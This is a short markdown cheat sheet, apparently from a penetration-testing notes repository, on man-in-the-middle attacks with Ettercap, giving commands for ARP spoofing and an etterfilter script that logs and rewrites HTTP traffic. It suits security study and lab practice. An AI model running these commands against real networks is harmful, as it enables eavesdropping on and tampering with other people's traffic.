killchain-compendium/Post Exploitation/Man in the Middle.md

32 lines
787 B
Markdown

# Man In the Middle
* [Ettercap](https://www.ettercap-project.org/)
* [Bettercap](https://www.bettercap.org/)
* ARP spoofing via ettercap and read traffic. Press q to reverse to pre mitm arp caches
```sh
ettercap -T -i <interface> -M arp
```
* Etterfilter can filter and restructure packets
```sh
man etterfilter
```
```sh
if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
log(DATA.data, "/tmp/ettercap.log");
replace("filename.html", "otherfilename.html" );
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
}
```
* Escape double quote inside the payload string
* compile via
```sh
etterfilter filter.ef -o filter.ef
```
* Run the filter via
```sh
ettercap -T -i <interface> -M arp -F filter.ef
```